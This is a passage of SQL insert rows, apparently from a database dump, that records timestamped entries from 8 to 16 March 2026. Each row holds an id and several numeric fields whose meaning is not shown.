(27403, '2026-03-08 02:20:08', 1, 2062, 0, 1, 1),
(27404, '2026-03-08 09:14:53', 1, 2061, 0, 1, 1),
(27405, '2026-03-08 09:18:44', 1, 2060, 0, 1, 1),
(27406, '2026-03-08 09:27:24', 1, 2064, 0, 1, 1),
(27407, '2026-03-08 09:27:34', 1, 2064, 0, 1, 1),
(27408, '2026-03-08 09:42:02', 1, 2060, 0, 1, 1),
(27409, '2026-03-08 13:50:04', 1, 2053, 0, 1, 1),
(27410, '2026-03-08 14:08:32', 1, 2060, 0, 1, 1),
(27411, '2026-03-08 14:17:36', 1, 2060, 0, 1, 1),
(27412, '2026-03-08 14:18:03', 1, 2054, 0, 1, 1),
(27413, '2026-03-08 14:18:14', 1, 2062, 0, 1, 1),
(27414, '2026-03-08 14:19:31', 1, 2058, 0, 1, 1),
(27415, '2026-03-08 14:19:35', 1, 2055, 0, 1, 1),
(27416, '2026-03-08 14:20:29', 1, 2061, 0, 1, 1),
(27417, '2026-03-08 14:20:40', 1, 2060, 0, 1, 1),
(27418, '2026-03-08 14:53:38', 1, 2059, 0, 1, 1),
(27419, '2026-03-08 14:55:37', 1, 2059, 0, 1, 1),
(27420, '2026-03-08 15:20:26', 1, 2053, 0, 1, 1),
(27421, '2026-03-08 15:35:01', 1, 2053, 0, 1, 1),
(27422, '2026-03-08 16:42:13', 1, 2063, 0, 1, 1),
(27423, '2026-03-08 17:00:24', 1, 2058, 0, 1, 1),
(27424, '2026-03-08 17:02:42', 1, 2061, 0, 1, 1),
(27425, '2026-03-08 17:16:04', 1, 2061, 0, 1, 1),
(27426, '2026-03-08 17:16:45', 1, 2061, 0, 1, 1),
(27427, '2026-03-08 17:17:24', 1, 2061, 0, 1, 1),
(27428, '2026-03-08 17:17:56', 1, 2061, 0, 1, 1),
(27429, '2026-03-08 17:18:45', 1, 2061, 0, 1, 1),
(27430, '2026-03-08 18:04:43', 1, 2062, 0, 1, 1),
(27431, '2026-03-08 18:05:38', 1, 2062, 0, 1, 1),
(27432, '2026-03-08 21:57:18', 1, 2064, 0, 1, 1),
(27433, '2026-03-08 21:57:18', 1, 2064, 0, 1, 1),
(27434, '2026-03-08 21:57:18', 1, 2064, 0, 1, 1),
(27435, '2026-03-08 21:57:19', 1, 2063, 0, 1, 1),
(27436, '2026-03-08 21:57:19', 1, 2062, 0, 1, 1),
(27437, '2026-03-08 21:57:19', 1, 2060, 0, 1, 1),
(27438, '2026-03-08 21:57:19', 1, 2061, 0, 1, 1),
(27439, '2026-03-08 21:57:19', 1, 2059, 0, 1, 1),
(27440, '2026-03-08 21:57:22', 1, 2058, 0, 1, 1),
(27441, '2026-03-08 21:57:22', 1, 2064, 0, 1, 1),
(27442, '2026-03-08 21:57:23', 1, 2064, 0, 1, 1),
(27443, '2026-03-08 21:57:23', 1, 2063, 0, 1, 1),
(27444, '2026-03-08 21:57:23', 1, 2062, 0, 1, 1),
(27445, '2026-03-08 21:57:23', 1, 2061, 0, 1, 1),
(27446, '2026-03-08 21:57:24', 1, 2060, 0, 1, 1),
(27447, '2026-03-08 21:57:24', 1, 2059, 0, 1, 1),
(27448, '2026-03-08 21:57:25', 1, 2064, 0, 1, 1),
(27449, '2026-03-08 21:57:26', 1, 2055, 0, 1, 1),
(27450, '2026-03-08 21:57:26', 1, 2063, 0, 1, 1),
(27451, '2026-03-08 21:57:26', 1, 2064, 0, 1, 1),
(27452, '2026-03-08 21:57:26', 1, 2060, 0, 1, 1),
(27453, '2026-03-08 21:57:26', 1, 2062, 0, 1, 1),
(27454, '2026-03-08 21:57:26', 1, 2059, 0, 1, 1),
(27455, '2026-03-08 21:57:26', 1, 2061, 0, 1, 1),
(27456, '2026-03-08 21:57:27', 1, 2058, 0, 1, 1),
(27457, '2026-03-08 21:57:28', 1, 2058, 0, 1, 1),
(27458, '2026-03-08 21:57:28', 1, 2064, 0, 1, 1),
(27459, '2026-03-08 21:57:28', 1, 2055, 0, 1, 1),
(27460, '2026-03-08 21:57:29', 1, 2064, 0, 1, 1),
(27461, '2026-03-08 21:57:29', 1, 2062, 0, 1, 1),
(27462, '2026-03-08 21:57:29', 1, 2063, 0, 1, 1),
(27463, '2026-03-08 21:57:29', 1, 2060, 0, 1, 1),
(27464, '2026-03-08 21:57:29', 1, 2061, 0, 1, 1),
(27465, '2026-03-08 21:57:29', 1, 2059, 0, 1, 1),
(27466, '2026-03-08 21:57:32', 1, 2062, 0, 1, 1),
(27467, '2026-03-08 21:57:32', 1, 2060, 0, 1, 1),
(27468, '2026-03-08 21:57:32', 1, 2055, 0, 1, 1),
(27469, '2026-03-08 21:57:32', 1, 2063, 0, 1, 1),
(27470, '2026-03-08 21:57:32', 1, 2064, 0, 1, 1),
(27471, '2026-03-08 21:57:32', 1, 2061, 0, 1, 1),
(27472, '2026-03-08 21:57:32', 1, 2059, 0, 1, 1),
(27473, '2026-03-08 21:57:32', 1, 2064, 0, 1, 1),
(27474, '2026-03-08 21:57:34', 1, 2058, 0, 1, 1),
(27475, '2026-03-08 21:57:34', 1, 2064, 0, 1, 1),
(27476, '2026-03-08 21:57:34', 1, 2055, 0, 1, 1),
(27477, '2026-03-08 21:57:34', 1, 2058, 0, 1, 1),
(27478, '2026-03-08 21:57:34', 1, 2064, 0, 1, 1),
(27479, '2026-03-08 21:57:34', 1, 2063, 0, 1, 1),
(27480, '2026-03-08 21:57:35', 1, 2061, 0, 1, 1),
(27481, '2026-03-08 21:57:35', 1, 2062, 0, 1, 1),
(27482, '2026-03-08 21:57:36', 1, 2060, 0, 1, 1),
(27483, '2026-03-08 21:57:36', 1, 2059, 0, 1, 1),
(27484, '2026-03-08 21:57:37', 1, 2055, 0, 1, 1),
(27485, '2026-03-08 21:57:37', 1, 2054, 0, 1, 1),
(27486, '2026-03-08 21:57:38', 1, 2058, 0, 1, 1),
(27487, '2026-03-08 21:57:38', 1, 2055, 0, 1, 1),
(27488, '2026-03-08 21:57:39', 1, 2054, 0, 1, 1),
(27489, '2026-03-08 21:57:39', 1, 2054, 0, 1, 1),
(27490, '2026-03-08 21:59:43', 1, 2063, 0, 1, 1),
(27491, '2026-03-08 21:59:43', 1, 2064, 0, 1, 1),
(27492, '2026-03-08 21:59:43', 1, 2064, 0, 1, 1),
(27493, '2026-03-08 21:59:43', 1, 2064, 0, 1, 1),
(27494, '2026-03-08 21:59:43', 1, 2061, 0, 1, 1),
(27495, '2026-03-08 21:59:43', 1, 2062, 0, 1, 1),
(27496, '2026-03-08 21:59:45', 1, 2060, 0, 1, 1),
(27497, '2026-03-08 21:59:45', 1, 2059, 0, 1, 1),
(27498, '2026-03-08 21:59:45', 1, 2058, 0, 1, 1),
(27499, '2026-03-08 21:59:45', 1, 2055, 0, 1, 1),
(27500, '2026-03-08 21:59:48', 1, 2064, 0, 1, 1),
(27501, '2026-03-08 21:59:48', 1, 2054, 0, 1, 1),
(27502, '2026-03-08 21:59:48', 1, 2064, 0, 1, 1),
(27503, '2026-03-08 21:59:49', 1, 2064, 0, 1, 1),
(27504, '2026-03-08 21:59:49', 1, 2064, 0, 1, 1),
(27505, '2026-03-08 21:59:50', 1, 2054, 0, 1, 1),
(27506, '2026-03-08 23:21:02', 1, 2064, 0, 1, 1),
(27507, '2026-03-08 23:23:50', 1, 2063, 0, 1, 1),
(27508, '2026-03-09 01:06:41', 1, 2060, 0, 1, 1),
(27509, '2026-03-09 02:05:07', 1, 2061, 0, 1, 1),
(27510, '2026-03-09 03:30:53', 1, 2053, 0, 1, 1),
(27511, '2026-03-09 03:37:53', 1, 2060, 0, 1, 1),
(27512, '2026-03-09 04:00:10', 1, 2063, 0, 1, 1),
(27513, '2026-03-09 04:02:19', 1, 2064, 0, 1, 1),
(27514, '2026-03-09 04:02:24', 1, 2059, 0, 1, 1),
(27515, '2026-03-09 04:04:38', 1, 2054, 0, 1, 1),
(27516, '2026-03-09 04:04:58', 1, 2061, 0, 1, 1),
(27517, '2026-03-09 04:05:10', 1, 2060, 0, 1, 1),
(27518, '2026-03-09 04:08:56', 1, 2055, 0, 1, 1),
(27519, '2026-03-09 04:14:31', 1, 2062, 0, 1, 1),
(27520, '2026-03-09 04:50:29', 1, 2058, 0, 1, 1),
(27521, '2026-03-09 04:58:14', 1, 2053, 0, 1, 1),
(27522, '2026-03-09 05:11:26', 1, 2064, 0, 1, 1),
(27523, '2026-03-09 05:15:11', 1, 2061, 0, 1, 1),
(27524, '2026-03-09 05:50:08', 1, 2058, 0, 1, 1),
(27525, '2026-03-09 06:22:40', 1, 2053, 0, 1, 1),
(27526, '2026-03-09 11:24:35', 1, 2054, 0, 1, 1),
(27527, '2026-03-09 14:16:42', 1, 2059, 0, 1, 1),
(27528, '2026-03-09 14:18:49', 1, 2054, 0, 1, 1),
(27529, '2026-03-09 14:19:26', 1, 2060, 0, 1, 1),
(27530, '2026-03-09 14:20:10', 1, 2058, 0, 1, 1),
(27531, '2026-03-09 14:20:36', 1, 2054, 0, 1, 1),
(27532, '2026-03-09 14:21:44', 1, 2060, 0, 1, 1),
(27533, '2026-03-09 14:22:36', 1, 2055, 0, 1, 1),
(27534, '2026-03-09 15:07:12', 1, 2061, 0, 1, 1),
(27535, '2026-03-09 15:44:56', 1, 2060, 0, 1, 1),
(27536, '2026-03-09 15:51:06', 1, 2059, 0, 1, 1),
(27537, '2026-03-09 16:19:04', 1, 2053, 0, 1, 1),
(27538, '2026-03-09 16:33:14', 1, 2062, 0, 1, 1),
(27539, '2026-03-09 16:33:37', 1, 2062, 0, 1, 1),
(27540, '2026-03-09 19:37:53', 1, 2054, 0, 1, 1),
(27541, '2026-03-09 19:38:00', 1, 2058, 0, 1, 1),
(27542, '2026-03-09 19:43:29', 1, 2061, 0, 1, 1),
(27543, '2026-03-09 20:48:08', 1, 2064, 0, 1, 1),
(27544, '2026-03-09 21:53:01', 1, 2055, 0, 1, 1),
(27545, '2026-03-09 22:29:06', 1, 2053, 0, 1, 1),
(27546, '2026-03-09 22:42:05', 1, 2055, 0, 1, 1),
(27547, '2026-03-09 22:50:41', 1, 2058, 0, 1, 1),
(27548, '2026-03-10 00:38:28', 1, 2060, 0, 1, 1),
(27549, '2026-03-10 01:10:39', 1, 2061, 0, 1, 1),
(27550, '2026-03-10 02:37:40', 1, 2055, 0, 1, 1),
(27551, '2026-03-10 03:29:20', 1, 2060, 0, 1, 1),
(27552, '2026-03-10 06:35:57', 1, 2055, 0, 1, 1),
(27553, '2026-03-10 06:37:45', 1, 2060, 0, 1, 1),
(27554, '2026-03-10 06:53:39', 1, 2064, 8030, 1, 1),
(27555, '2026-03-10 07:22:51', 1, 2060, 0, 1, 1),
(27556, '2026-03-10 08:03:40', 1, 2054, 0, 1, 1),
(27557, '2026-03-10 08:35:47', 1, 2060, 0, 1, 1),
(27558, '2026-03-10 08:43:04', 1, 2053, 0, 1, 1),
(27559, '2026-03-10 08:47:21', 1, 2062, 0, 1, 1),
(27560, '2026-03-10 08:54:08', 1, 2063, 0, 1, 1),
(27561, '2026-03-10 09:00:26', 1, 2060, 0, 1, 1),
(27562, '2026-03-10 09:06:43', 1, 2059, 0, 1, 1),
(27563, '2026-03-10 13:42:06', 1, 2060, 0, 1, 1),
(27564, '2026-03-10 14:18:45', 1, 2055, 0, 1, 1),
(27565, '2026-03-10 14:19:25', 1, 2060, 0, 1, 1),
(27566, '2026-03-10 14:20:34', 1, 2062, 0, 1, 1),
(27567, '2026-03-10 14:22:07', 1, 2061, 0, 1, 1),
(27568, '2026-03-10 14:22:10', 1, 2058, 0, 1, 1),
(27569, '2026-03-10 14:22:12', 1, 2060, 0, 1, 1),
(27570, '2026-03-10 14:22:26', 1, 2058, 0, 1, 1),
(27571, '2026-03-10 14:22:31', 1, 2054, 0, 1, 1),
(27572, '2026-03-10 14:29:40', 1, 2053, 0, 1, 1),
(27573, '2026-03-10 14:35:26', 1, 2061, 0, 1, 1),
(27574, '2026-03-10 14:47:21', 1, 2054, 0, 1, 1),
(27575, '2026-03-10 14:47:22', 1, 2055, 0, 1, 1),
(27576, '2026-03-10 14:47:23', 1, 2064, 0, 1, 1),
(27577, '2026-03-10 14:47:24', 1, 2064, 0, 1, 1),
(27578, '2026-03-10 14:47:25', 1, 2064, 0, 1, 1),
(27579, '2026-03-10 14:47:26', 1, 2063, 0, 1, 1),
(27580, '2026-03-10 14:47:27', 1, 2062, 0, 1, 1),
(27581, '2026-03-10 14:47:28', 1, 2060, 0, 1, 1),
(27582, '2026-03-10 14:47:29', 1, 2059, 0, 1, 1),
(27583, '2026-03-10 14:47:30', 1, 2061, 0, 1, 1),
(27584, '2026-03-10 14:47:31', 1, 2058, 0, 1, 1),
(27585, '2026-03-10 15:49:50', 1, 2064, 0, 1, 1),
(27586, '2026-03-10 16:22:23', 1, 2062, 0, 1, 1),
(27587, '2026-03-10 16:23:17', 1, 2062, 0, 1, 1),
(27588, '2026-03-10 18:46:38', 1, 2061, 0, 1, 1),
(27589, '2026-03-10 20:52:11', 1, 2060, 0, 1, 1),
(27590, '2026-03-11 01:51:20', 1, 2061, 0, 1, 1),
(27591, '2026-03-11 02:10:56', 1, 2059, 0, 1, 1),
(27592, '2026-03-11 02:10:57', 1, 2060, 0, 1, 1),
(27593, '2026-03-11 03:15:42', 1, 2053, 0, 1, 1),
(27594, '2026-03-11 03:46:37', 1, 2061, 0, 1, 1),
(27595, '2026-03-11 03:50:17', 1, 2061, 0, 1, 1),
(27596, '2026-03-11 04:10:57', 1, 2063, 0, 1, 1),
(27597, '2026-03-11 04:35:10', 1, 2053, 0, 1, 1),
(27598, '2026-03-11 04:57:17', 1, 2060, 0, 1, 1),
(27599, '2026-03-11 05:11:06', 1, 2061, 0, 1, 1),
(27600, '2026-03-11 05:45:02', 1, 2055, 0, 1, 1),
(27601, '2026-03-11 06:49:27', 1, 2062, 0, 1, 1),
(27602, '2026-03-11 08:32:37', 1, 2061, 0, 1, 1),
(27603, '2026-03-11 08:42:24', 1, 2053, 0, 1, 1),
(27604, '2026-03-11 11:55:55', 1, 2064, 0, 1, 1),
(27605, '2026-03-11 12:34:49', 1, 2060, 0, 1, 1),
(27606, '2026-03-11 14:13:51', 1, 2060, 0, 1, 1),
(27607, '2026-03-11 14:13:54', 1, 2060, 0, 1, 1),
(27608, '2026-03-11 14:18:27', 1, 2058, 0, 1, 1),
(27609, '2026-03-11 14:19:23', 1, 2060, 0, 1, 1),
(27610, '2026-03-11 14:21:59', 1, 2055, 0, 1, 1),
(27611, '2026-03-11 14:22:33', 1, 2060, 0, 1, 1),
(27612, '2026-03-11 14:23:13', 1, 2054, 0, 1, 1),
(27613, '2026-03-11 15:08:46', 1, 2064, 0, 1, 1),
(27614, '2026-03-11 16:23:47', 1, 2062, 0, 1, 1),
(27615, '2026-03-11 17:14:59', 1, 2061, 0, 1, 1),
(27616, '2026-03-11 17:37:38', 1, 2059, 0, 1, 1),
(27617, '2026-03-11 20:27:34', 1, 2060, 0, 1, 1),
(27618, '2026-03-11 20:44:03', 1, 2060, 0, 1, 1),
(27619, '2026-03-11 23:16:25', 1, 2053, 0, 1, 1),
(27620, '2026-03-12 02:27:08', 1, 2063, 0, 1, 1),
(27621, '2026-03-12 02:27:44', 1, 2054, 0, 1, 1),
(27622, '2026-03-12 02:41:42', 1, 2062, 0, 1, 1),
(27623, '2026-03-12 03:44:36', 1, 2060, 0, 1, 1),
(27624, '2026-03-12 03:44:38', 1, 2060, 0, 1, 1),
(27625, '2026-03-12 04:36:18', 1, 2064, 0, 1, 1),
(27626, '2026-03-12 05:16:29', 1, 2064, 0, 1, 1),
(27627, '2026-03-12 05:16:35', 1, 2058, 0, 1, 1),
(27628, '2026-03-12 05:16:38', 1, 2060, 0, 1, 1),
(27629, '2026-03-12 05:16:40', 1, 2063, 0, 1, 1),
(27630, '2026-03-12 05:16:41', 1, 2063, 0, 1, 1),
(27631, '2026-03-12 05:16:43', 1, 2061, 0, 1, 1),
(27632, '2026-03-12 05:16:44', 1, 2059, 0, 1, 1),
(27633, '2026-03-12 05:16:46', 1, 2062, 0, 1, 1),
(27634, '2026-03-12 05:16:49', 1, 2062, 0, 1, 1),
(27635, '2026-03-12 05:16:50', 1, 2054, 0, 1, 1),
(27636, '2026-03-12 05:16:56', 1, 2055, 0, 1, 1),
(27637, '2026-03-12 06:49:36', 1, 2060, 0, 1, 1),
(27638, '2026-03-12 07:02:25', 1, 2062, 0, 1, 1),
(27639, '2026-03-12 07:36:22', 1, 2053, 0, 1, 1),
(27640, '2026-03-12 09:15:35', 1, 2061, 0, 1, 1),
(27641, '2026-03-12 11:19:31', 1, 2063, 0, 1, 1),
(27642, '2026-03-12 11:19:33', 1, 2061, 0, 1, 1),
(27643, '2026-03-12 11:19:34', 1, 2064, 0, 1, 1),
(27644, '2026-03-12 11:19:34', 1, 2058, 0, 1, 1),
(27645, '2026-03-12 11:19:37', 1, 2062, 0, 1, 1),
(27646, '2026-03-12 11:19:38', 1, 2054, 0, 1, 1),
(27647, '2026-03-12 11:19:39', 1, 2059, 0, 1, 1),
(27648, '2026-03-12 11:19:41', 1, 2055, 0, 1, 1),
(27649, '2026-03-12 11:19:44', 1, 2060, 0, 1, 1),
(27650, '2026-03-12 11:21:25', 1, 2060, 0, 1, 1),
(27651, '2026-03-12 11:21:35', 1, 2054, 0, 1, 1),
(27652, '2026-03-12 11:21:36', 1, 2064, 0, 1, 1),
(27653, '2026-03-12 11:21:37', 1, 2058, 0, 1, 1),
(27654, '2026-03-12 11:21:39', 1, 2059, 0, 1, 1),
(27655, '2026-03-12 11:21:40', 1, 2063, 0, 1, 1),
(27656, '2026-03-12 11:21:41', 1, 2062, 0, 1, 1),
(27657, '2026-03-12 11:21:42', 1, 2055, 0, 1, 1),
(27658, '2026-03-12 11:21:43', 1, 2060, 0, 1, 1),
(27659, '2026-03-12 11:21:45', 1, 2061, 0, 1, 1),
(27660, '2026-03-12 11:22:06', 1, 2064, 0, 1, 1),
(27661, '2026-03-12 11:22:06', 1, 2053, 0, 1, 1),
(27662, '2026-03-12 11:22:07', 1, 2055, 0, 1, 1),
(27663, '2026-03-12 11:22:10', 1, 2059, 0, 1, 1),
(27664, '2026-03-12 11:22:11', 1, 2063, 0, 1, 1),
(27665, '2026-03-12 11:22:13', 1, 2054, 0, 1, 1),
(27666, '2026-03-12 11:22:15', 1, 2061, 0, 1, 1),
(27667, '2026-03-12 11:22:16', 1, 2060, 0, 1, 1),
(27668, '2026-03-12 11:22:19', 1, 2058, 0, 1, 1),
(27669, '2026-03-12 11:22:21', 1, 2062, 0, 1, 1),
(27670, '2026-03-12 13:58:13', 1, 2053, 0, 1, 1),
(27671, '2026-03-12 14:14:16', 1, 2061, 0, 1, 1),
(27672, '2026-03-12 14:15:40', 1, 2061, 0, 1, 1),
(27673, '2026-03-12 14:20:29', 1, 2060, 0, 1, 1),
(27674, '2026-03-12 14:22:26', 1, 2060, 0, 1, 1),
(27675, '2026-03-12 14:23:04', 1, 2058, 0, 1, 1),
(27676, '2026-03-12 14:23:20', 1, 2054, 0, 1, 1),
(27677, '2026-03-12 14:23:32', 1, 2062, 0, 1, 1),
(27678, '2026-03-12 14:23:48', 1, 2055, 0, 1, 1),
(27679, '2026-03-12 15:39:21', 1, 2061, 0, 1, 1),
(27680, '2026-03-12 17:12:07', 1, 2062, 0, 1, 1),
(27681, '2026-03-12 17:12:35', 1, 2062, 0, 1, 1),
(27682, '2026-03-12 18:47:33', 1, 2060, 0, 1, 1),
(27683, '2026-03-12 21:18:29', 1, 2064, 8102, 1, 1),
(27684, '2026-03-12 21:18:33', 1, 2064, 8102, 1, 1),
(27685, '2026-03-12 21:30:09', 1, 2061, 0, 1, 1),
(27686, '2026-03-12 23:53:23', 1, 2053, 0, 1, 1),
(27687, '2026-03-13 00:21:45', 1, 2061, 0, 1, 1),
(27688, '2026-03-13 03:41:50', 1, 2053, 0, 1, 1),
(27689, '2026-03-13 04:23:20', 1, 2060, 0, 1, 1),
(27690, '2026-03-13 05:51:43', 1, 2060, 0, 1, 1),
(27691, '2026-03-13 06:21:59', 1, 2061, 0, 1, 1),
(27692, '2026-03-13 06:55:38', 1, 2061, 0, 1, 1),
(27693, '2026-03-13 09:18:18', 1, 2061, 0, 1, 1),
(27694, '2026-03-13 11:45:26', 1, 2055, 0, 1, 1),
(27695, '2026-03-13 12:03:23', 1, 2053, 0, 1, 1),
(27696, '2026-03-13 14:20:02', 1, 2060, 0, 1, 1),
(27697, '2026-03-13 14:20:29', 1, 2060, 0, 1, 1),
(27698, '2026-03-13 14:21:26', 1, 2059, 0, 1, 1),
(27699, '2026-03-13 14:21:33', 1, 2054, 0, 1, 1),
(27700, '2026-03-13 14:23:58', 1, 2058, 0, 1, 1),
(27701, '2026-03-13 14:24:04', 1, 2062, 0, 1, 1),
(27702, '2026-03-13 14:24:28', 1, 2055, 0, 1, 1),
(27703, '2026-03-13 15:28:38', 1, 2053, 0, 1, 1),
(27704, '2026-03-13 16:32:08', 1, 2062, 0, 1, 1),
(27705, '2026-03-13 16:32:40', 1, 2062, 0, 1, 1),
(27706, '2026-03-13 19:15:52', 1, 2061, 0, 1, 1),
(27707, '2026-03-13 20:17:19', 1, 2058, 0, 1, 1),
(27708, '2026-03-13 20:41:50', 1, 2061, 0, 1, 1),
(27709, '2026-03-13 21:40:55', 1, 2054, 0, 1, 1),
(27710, '2026-03-13 21:54:39', 1, 2060, 0, 1, 1),
(27711, '2026-03-13 22:39:23', 1, 2061, 0, 1, 1),
(27712, '2026-03-13 22:39:27', 1, 2063, 0, 1, 1),
(27713, '2026-03-13 22:39:31', 1, 2062, 0, 1, 1),
(27714, '2026-03-14 01:36:31', 1, 2064, 0, 1, 1),
(27715, '2026-03-14 01:44:36', 1, 2053, 0, 1, 1),
(27716, '2026-03-14 01:48:41', 1, 2063, 0, 1, 1),
(27717, '2026-03-14 03:50:07', 1, 2060, 0, 1, 1),
(27718, '2026-03-14 03:52:32', 1, 2053, 0, 1, 1),
(27719, '2026-03-14 06:25:33', 1, 2058, 0, 1, 1),
(27720, '2026-03-14 06:26:43', 1, 2062, 0, 1, 1),
(27721, '2026-03-14 06:38:16', 1, 2059, 0, 1, 1),
(27722, '2026-03-14 06:38:20', 1, 2060, 0, 1, 1),
(27723, '2026-03-14 08:34:18', 1, 2060, 0, 1, 1),
(27724, '2026-03-14 08:42:40', 1, 2058, 0, 1, 1),
(27725, '2026-03-14 08:42:48', 1, 2053, 0, 1, 1),
(27726, '2026-03-14 09:10:05', 1, 2061, 0, 1, 1),
(27727, '2026-03-14 10:11:26', 1, 2053, 0, 1, 1),
(27728, '2026-03-14 11:45:46', 1, 2054, 0, 1, 1),
(27729, '2026-03-14 11:53:55', 1, 2054, 0, 1, 1),
(27730, '2026-03-14 12:02:12', 1, 2059, 0, 1, 1),
(27731, '2026-03-14 12:02:15', 1, 2054, 0, 1, 1),
(27732, '2026-03-14 12:02:16', 1, 2058, 0, 1, 1),
(27733, '2026-03-14 12:02:17', 1, 2060, 0, 1, 1),
(27734, '2026-03-14 12:02:20', 1, 2055, 0, 1, 1),
(27735, '2026-03-14 14:19:47', 1, 2058, 0, 1, 1),
(27736, '2026-03-14 14:22:09', 1, 2062, 0, 1, 1),
(27737, '2026-03-14 14:22:41', 1, 2055, 0, 1, 1),
(27738, '2026-03-14 14:23:25', 1, 2054, 0, 1, 1),
(27739, '2026-03-14 14:24:16', 1, 2060, 0, 1, 1),
(27740, '2026-03-14 14:24:35', 1, 2060, 0, 1, 1),
(27741, '2026-03-14 14:27:52', 1, 2061, 0, 1, 1),
(27742, '2026-03-14 15:11:58', 1, 2053, 0, 1, 1),
(27743, '2026-03-14 16:31:44', 1, 2061, 0, 1, 1),
(27744, '2026-03-14 16:41:23', 1, 2058, 0, 1, 1),
(27745, '2026-03-14 16:52:42', 1, 2055, 0, 1, 1),
(27746, '2026-03-14 16:58:32', 1, 2059, 0, 1, 1),
(27747, '2026-03-14 17:00:46', 1, 2054, 0, 1, 1),
(27748, '2026-03-14 17:02:39', 1, 2062, 0, 1, 1),
(27749, '2026-03-14 17:02:58', 1, 2062, 0, 1, 1),
(27750, '2026-03-14 18:49:31', 1, 2060, 0, 1, 1),
(27751, '2026-03-14 19:27:39', 1, 2061, 0, 1, 1),
(27752, '2026-03-14 19:28:19', 1, 2055, 0, 1, 1),
(27753, '2026-03-14 19:30:34', 1, 2054, 0, 1, 1),
(27754, '2026-03-14 19:30:55', 1, 2058, 0, 1, 1),
(27755, '2026-03-14 19:31:15', 1, 2063, 0, 1, 1),
(27756, '2026-03-14 19:33:54', 1, 2062, 0, 1, 1),
(27757, '2026-03-14 19:35:06', 1, 2064, 0, 1, 1),
(27758, '2026-03-14 19:44:35', 1, 2060, 0, 1, 1),
(27759, '2026-03-14 19:46:58', 1, 2059, 0, 1, 1),
(27760, '2026-03-14 19:54:23', 1, 2053, 0, 1, 1),
(27761, '2026-03-14 20:00:03', 1, 2060, 0, 1, 1),
(27762, '2026-03-14 20:43:32', 1, 2061, 0, 1, 1),
(27763, '2026-03-14 22:20:14', 1, 2053, 0, 1, 1),
(27764, '2026-03-14 22:40:33', 1, 2064, 0, 1, 1),
(27765, '2026-03-14 23:02:05', 1, 2059, 0, 1, 1),
(27766, '2026-03-14 23:30:32', 1, 2062, 0, 1, 1),
(27767, '2026-03-14 23:58:08', 1, 2060, 0, 1, 1),
(27768, '2026-03-15 03:41:30', 1, 2053, 0, 1, 1),
(27769, '2026-03-15 04:34:25', 1, 2062, 0, 1, 1),
(27770, '2026-03-15 05:04:30', 1, 2053, 0, 1, 1),
(27771, '2026-03-15 05:07:23', 1, 2061, 0, 1, 1),
(27772, '2026-03-15 05:58:40', 1, 2059, 0, 1, 1),
(27773, '2026-03-15 05:59:17', 1, 2060, 0, 1, 1),
(27774, '2026-03-15 07:59:37', 1, 2063, 0, 1, 1),
(27775, '2026-03-15 08:35:49', 1, 2058, 0, 1, 1),
(27776, '2026-03-15 09:10:51', 1, 2061, 0, 1, 1),
(27777, '2026-03-15 10:39:46', 1, 2060, 0, 1, 1),
(27778, '2026-03-15 10:56:31', 1, 2061, 0, 1, 1),
(27779, '2026-03-15 10:56:32', 1, 2061, 0, 1, 1),
(27780, '2026-03-15 12:09:45', 1, 2053, 0, 1, 1),
(27781, '2026-03-15 12:22:18', 1, 2063, 0, 1, 1),
(27782, '2026-03-15 12:50:07', 1, 2062, 0, 1, 1),
(27783, '2026-03-15 12:50:14', 1, 2063, 0, 1, 1),
(27784, '2026-03-15 13:47:10', 1, 2059, 0, 1, 1),
(27785, '2026-03-15 14:19:07', 1, 2062, 0, 1, 1),
(27786, '2026-03-15 14:20:39', 1, 2060, 0, 1, 1),
(27787, '2026-03-15 14:22:05', 1, 2058, 0, 1, 1),
(27788, '2026-03-15 14:22:24', 1, 2058, 0, 1, 1),
(27789, '2026-03-15 14:22:36', 1, 2060, 0, 1, 1),
(27790, '2026-03-15 14:22:38', 1, 2054, 0, 1, 1),
(27791, '2026-03-15 14:23:58', 1, 2055, 0, 1, 1),
(27792, '2026-03-15 16:17:31', 1, 2061, 0, 1, 1),
(27793, '2026-03-15 16:19:17', 1, 2060, 0, 1, 1),
(27794, '2026-03-15 16:32:32', 1, 2062, 0, 1, 1),
(27795, '2026-03-15 16:41:44', 1, 2063, 0, 1, 1),
(27796, '2026-03-15 18:54:56', 1, 2061, 0, 1, 1),
(27797, '2026-03-15 20:32:22', 1, 2062, 0, 1, 1),
(27798, '2026-03-15 23:25:06', 1, 2060, 0, 1, 1),
(27799, '2026-03-15 23:52:39', 1, 2053, 0, 1, 1),
(27800, '2026-03-15 23:59:46', 1, 2061, 0, 1, 1),
(27801, '2026-03-16 00:10:06', 1, 2058, 0, 1, 1),
(27802, '2026-03-16 02:37:33', 1, 2055, 0, 1, 1),
(27803, '2026-03-16 02:50:49', 1, 2060, 0, 1, 1),
(27804, '2026-03-16 02:50:51', 1, 2060, 0, 1, 1),
(27805, '2026-03-16 03:19:16', 1, 2061, 0, 1, 1),
(27806, '2026-03-16 04:18:22', 1, 2053, 0, 1, 1),
(27807, '2026-03-16 05:04:12', 1, 2060, 0, 1, 1),
(27808, '2026-03-16 05:29:02', 1, 2059, 0, 1, 1),
(27809, '2026-03-16 08:36:37', 1, 2060, 0, 1, 1),
(27810, '2026-03-16 08:36:59', 1, 2058, 0, 1, 1),
(27811, '2026-03-16 08:49:56', 4, 2064, 8165, 1, 1),
(27812, '2026-03-16 08:54:18', 1, 2062, 0, 1, 1),
(27813, '2026-03-16 09:11:53', 1, 2063, 0, 1, 1),
(27814, '2026-03-16 09:28:39', 1, 2059, 0, 1, 1),
(27815, '2026-03-16 09:36:26', 4, 2061, 8167, 1, 1),
(27816, '2026-03-16 09:37:22', 1, 2060, 0, 1, 1),
(27817, '2026-03-16 10:28:48', 1, 2054, 0, 1, 1),
(27818, '2026-03-16 11:06:48', 1, 2060, 0, 1, 1),
(27819, '2026-03-16 14:18:09', 1, 2058, 0, 1, 1),
(27820, '2026-03-16 14:18:18', 1, 2054, 0, 1, 1),
(27821, '2026-03-16 14:18:24', 1, 2055, 0, 1, 1),
(27822, '2026-03-16 14:19:07', 1, 2062, 0, 1, 1),
(27823, '2026-03-16 14:19:53', 1, 2054, 0, 1, 1),
(27824, '2026-03-16 14:21:37', 1, 2060, 0, 1, 1),
(27825, '2026-03-16 14:21:40', 1, 2060, 0, 1, 1),
(27826, '2026-03-16 14:22:00', 1, 2060, 0, 1, 1),
(27827, '2026-03-16 14:49:36', 1, 2061, 0, 1, 1),
(27828, '2026-03-16 15:30:58', 1, 2053, 0, 1, 1),
(27829, '2026-03-16 15:31:50', 1, 2060, 0, 1, 1),
(27830, '2026-03-16 16:37:39', 1, 2060, 0, 1, 1),
